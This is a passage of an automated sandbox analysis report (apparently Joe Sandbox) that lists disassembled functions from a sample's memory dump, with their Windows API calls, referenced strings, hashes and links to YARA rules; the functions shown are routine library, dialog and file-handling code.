Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 38dc8400553abfbf76d73a194ed01b2bc283c9990cee5247ea10835ea838e0f5
Instruction ID: 63e7ff830bbaa57fdbfdf02c5301dad25024cc1d4ac659b4bde531b32100616f
Opcode Fuzzy Hash: 38dc8400553abfbf76d73a194ed01b2bc283c9990cee5247ea10835ea838e0f5
Instruction Fuzzy Hash: 61017872102F38AB9732637C7C8592B261DFFD0771B210428F555D2292EF30CCC14066

Function 0081075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00810A41: ResetEvent.KERNEL32(?), ref: 00810A53
Part of subcall function 00810A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00810A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0081078F
CloseHandle.KERNEL32(?,?), ref: 008107A9
DeleteCriticalSection.KERNEL32(?), ref: 008107C2
CloseHandle.KERNEL32(?), ref: 008107CE
CloseHandle.KERNEL32(?), ref: 008107DA

Part of subcall function 0081084E: WaitForSingleObject.KERNEL32(?,000000FF,00810A78,?), ref: 00810854
Part of subcall function 0081084E: GetLastError.KERNEL32(?), ref: 00810860

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 573d7ab599737118bbc22105116debb2e23db4a3eff3a9314b040afd82e7fc15
Instruction ID: 32d3afb4d7fe28eb19913f985e70bc0ae6d00c48f874f918b2199ecc782ac617
Opcode Fuzzy Hash: 573d7ab599737118bbc22105116debb2e23db4a3eff3a9314b040afd82e7fc15
Instruction Fuzzy Hash: C4015275544B04EBC7269B69DD84FC6BBEDFF89711F000929F15A821A0CBB66A84CF90

Function 0082BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0082BF28

Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506

_free.LIBCMT ref: 0082BF3A
_free.LIBCMT ref: 0082BF4C
_free.LIBCMT ref: 0082BF5E
_free.LIBCMT ref: 0082BF70

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 97582e563593e6ccdbdf06fcb6c6ba7da651d034db732582fce688cdcb6d809a
Instruction ID: a0b0602218624f10219e9936ecd185d630747d3d169d55386a6be19246685f95
Opcode Fuzzy Hash: 97582e563593e6ccdbdf06fcb6c6ba7da651d034db732582fce688cdcb6d809a
Instruction Fuzzy Hash: F5F0F93250A625EB8A20EB6CFE86C1A73E9FA407107644C89F048D7990CF30FCC08E69

Function 00828060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0082807E

Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506

_free.LIBCMT ref: 00828090
_free.LIBCMT ref: 008280A3
_free.LIBCMT ref: 008280B4
_free.LIBCMT ref: 008280C5

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e4bf1587d0553b5abb6e9663881b49195b55e8f9cffec5122d31ad09ad3c092a
Instruction ID: 98009d62b970563e13c913c4f449ea61e4f324a0f2f689422f6fd26481f588fd
Opcode Fuzzy Hash: e4bf1587d0553b5abb6e9663881b49195b55e8f9cffec5122d31ad09ad3c092a
Instruction Fuzzy Hash: 61F01778806525CB8F91BB19FC194053A65F72472030E668AF401DABB2CF710895AFC6

Function 00807574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00807579

Part of subcall function 00803B3D: __EH_prolog.LIBCMT ref: 00803B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00807640

Part of subcall function 00807BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00807C04
Part of subcall function 00807BF5: GetLastError.KERNEL32 ref: 00807C4A
Part of subcall function 00807BF5: CloseHandle.KERNEL32(?), ref: 00807C59

Strings

SeSecurityPrivilege, xrefs: 008075BE
SeRestorePrivilege, xrefs: 008075D3

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 2109b0d8ec60a1dfef58fff888666c2a9b19ecc666e6340a0583bac0347116fb
Instruction ID: df5ded5e0c0654097335e045250463a2f682e9242e5fb1454708a5bdd28dcd8b
Opcode Fuzzy Hash: 2109b0d8ec60a1dfef58fff888666c2a9b19ecc666e6340a0583bac0347116fb
Instruction Fuzzy Hash: 0E31D070E08248AEDF60EB689C05BEEBB78FF65314F000065F455E71D2CBB15A44CBA2

Function 0081A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365

EndDialog.USER32(?,00000001), ref: 0081A4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0081A4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0081A4E2

Strings

ASKNEXTVOL, xrefs: 0081A448

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: a9cf6412d5f8c7686cafd636b0b9113d7c9f28f5868d678bea084a8c1878f78a
Instruction ID: 07d8326c5bcd8935e478f493ceb650e1f128af5995360271ef3d056924ae747e
Opcode Fuzzy Hash: a9cf6412d5f8c7686cafd636b0b9113d7c9f28f5868d678bea084a8c1878f78a
Instruction Fuzzy Hash: C111D032245600AFEA259FA8DD0DFA637AEFF4A700F150044F240DB1A0C7E69981DB2B

Function 0080D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0080D22E
_strncpy.LIBCMT ref: 0080D278

Strings

$%s, xrefs: 0080D223
@%s, xrefs: 0080D218

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: d155a5547205f9f67ef2bcea426107322b02e3e136a907f0f58220c20c22b589
Instruction ID: 6b62111ef8161bbefc905a098aa69ddf8df3a511c818a690f7960b0780dd1927
Opcode Fuzzy Hash: d155a5547205f9f67ef2bcea426107322b02e3e136a907f0f58220c20c22b589
Instruction Fuzzy Hash: 45215E7244030CAAEB609EA4CD06FEA7BA8FF05300F044512FE14D61D2D775EA559B51

Function 0081A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365

EndDialog.USER32(?,00000001), ref: 0081A9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0081A9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0081AA24

Strings

GETPASSWORD1, xrefs: 0081A9A9

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: f06e5e2c5ad83caf4e1c2f33d2e80c30310a6572b21307f3cd25add82e127a8d
Instruction ID: e17bdbadfcd37f845751dcfc4f08e0cc2570bf963272384a2f27e8ce75816eff
Opcode Fuzzy Hash: f06e5e2c5ad83caf4e1c2f33d2e80c30310a6572b21307f3cd25add82e127a8d
Instruction Fuzzy Hash: FF1148329411287ADB259A64DD09FFB3B2CFF49711F010051FA49F20C1C2A599D4D6A3

Function 0080B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0080B51E

Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D

_wcschr.LIBVCRUNTIME ref: 0080B53C
_wcschr.LIBVCRUNTIME ref: 0080B54C

Strings

%c:\, xrefs: 0080B514

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 8635a227f8784293a1e70148c4eda10aaae5b9b64d74ffb71216c580e7576d47
Instruction ID: f91bfc125c6c34613d1f5ef498ce81da23324c0e9c9505a94292a7212faf1bec
Opcode Fuzzy Hash: 8635a227f8784293a1e70148c4eda10aaae5b9b64d74ffb71216c580e7576d47
Instruction Fuzzy Hash: D6012D73A44311BACB606BB9AC47C2BB7ACFF953A0B504466F945C70C1FB34D950C2A2

Function 008106BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0080ABC5,00000008,?,00000000,?,0080CB88,?,00000000), ref: 008106F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0080ABC5,00000008,?,00000000,?,0080CB88,?,00000000), ref: 008106FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0080ABC5,00000008,?,00000000,?,0080CB88,?,00000000), ref: 0081070D

Strings

Thread pool initialization failed., xrefs: 00810725

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 38b206d4864429c29e4c04d5d507add420814baf3edc3e67a0e483c3e87107b7
Instruction ID: 732f23ad47527b92aed93fdc1b2daa8139aa0399b2e93f2eca985384e469f49d
Opcode Fuzzy Hash: 38b206d4864429c29e4c04d5d507add420814baf3edc3e67a0e483c3e87107b7
Instruction Fuzzy Hash: 89116AB1500708AFC3215F658C84AA7FBECFFA4745F20482EE1DAC6240D6B169808B60

Function 0081D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0081D3C9, 0081D3FD
RENAMEDLG, xrefs: 0081D3DE

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 5b48d1c77c74e3fa1724cbc8a3e6e25b897b9a2fcce0ec09431f73f8caf501eb
Instruction ID: 8605a950e73d2c786532c58f81cb38e2af7526154b00985833d2e3ea4d27b3ac
Opcode Fuzzy Hash: 5b48d1c77c74e3fa1724cbc8a3e6e25b897b9a2fcce0ec09431f73f8caf501eb
Instruction Fuzzy Hash: E301B175600349AFCB119F58ED04F9A7BADFB09385F044421F905D2330DA75AC90EBA5

Function 008291DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00829269
__alldvrm.LIBCMT ref: 0082946A
__alldvrm.LIBCMT ref: 0082948C

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction ID: 18e3c35addeb67f79034d2a197c56dbacb889717e56f3cd496100ee07cb51188
Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction Fuzzy Hash: 3CA155729003A69FEB21DE68E8917AEBBA5FF51310F14416DE8D9DB381C23898C2C755

Function 0080A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008080B7,?,?,?), ref: 0080A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008080B7,?,?), ref: 0080A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008080B7,?,?,?,?,?,?,?,?), ref: 0080A416
CloseHandle.KERNEL32(?,?,00000000,?,008080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0080A41D

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 3059b2276b28165e8fa17518cbafabc9888c5777a9b2a51cacfffc7d6f6bb4c9
Instruction ID: 9c83b3aabd512d5d4d6b04463b315f8e13af656235e9111f458c93708a94a1ee
Opcode Fuzzy Hash: 3059b2276b28165e8fa17518cbafabc9888c5777a9b2a51cacfffc7d6f6bb4c9
Instruction Fuzzy Hash: AA41BE31248385AAE739DF64DC56BEABBE8FF85700F04091DB5D0D32C1D6A49A889B53

Function 0082C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008289AD,?,00000000,?,00000001,?,?,00000001,008289AD,?), ref: 0082C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0082C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,008267E2,?), ref: 0082C181
__freea.LIBCMT ref: 0082C18A

Part of subcall function 00828518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 5d0847129dd29c4a68a9a3fb62eed2b1b252b4938ee8de097cfac83960ee779f
Instruction ID: af8033d66b0bcb25304dc1d649791acb5f1d18898762567ece211d806fc80cf9
Opcode Fuzzy Hash: 5d0847129dd29c4a68a9a3fb62eed2b1b252b4938ee8de097cfac83960ee779f
Instruction Fuzzy Hash: 03319D72A0022AABDF258F69EC46DBE7BA5FB44710F150628FC05D6251E735CDA0CBA1

Function 00822503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0082251A

Part of subcall function 00822B52: ___AdjustPointer.LIBCMT ref: 00822B9C

_UnwindNestedFrames.LIBCMT ref: 00822531
___FrameUnwindToState.LIBVCRUNTIME ref: 00822543
CallCatchBlock.LIBVCRUNTIME ref: 00822567

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 9470cccc5f9bb354b3052b101ebfe2ac81733ad1360401968b8b550ec19ceba6
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: B5012932000118BBCF129F59ED01EDA3BBAFF58714F058115FD18A6121C376E9B1EBA1

Function 00819DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00819DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00819DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00819DDB
ReleaseDC.USER32(00000000,00000000), ref: 00819DE9

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 0c17eafc7ae71739c243a1934cff04a25cd01b410e7fadac57c3f5230d38a6f8
Instruction ID: cd3f632813b9bbb070643d405473813c628442fc6de8004a5c7a3f5cfae22251
Opcode Fuzzy Hash: 0c17eafc7ae71739c243a1934cff04a25cd01b410e7fadac57c3f5230d38a6f8
Instruction Fuzzy Hash: 2AE0EC35985E21A7D3211BA9BD0DB8F3B54BB0A762F061095FA05A6190DAB04445CB96

Function 00822016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00822016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0082201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00822020

Part of subcall function 0082310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0082311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00822035

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
